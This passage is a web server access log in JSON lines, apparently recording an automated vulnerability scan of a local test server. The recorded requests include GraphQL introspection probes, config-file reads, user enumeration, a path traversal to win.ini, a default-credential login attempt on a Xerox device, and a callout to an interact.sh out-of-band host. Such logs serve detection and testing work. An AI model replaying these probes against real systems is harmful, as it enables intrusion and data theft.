WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/61 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/62 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/63 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aplicacao/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.085","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cloudexp/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.003","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CGI/Java/Serviceability?adapter=device.statistics.configuration HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CGI/Java/Serviceability?adapter=device.statistics.configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /express-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph_cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-devtools HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground-html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /je/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /portal-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-laravel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sphinx-graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql 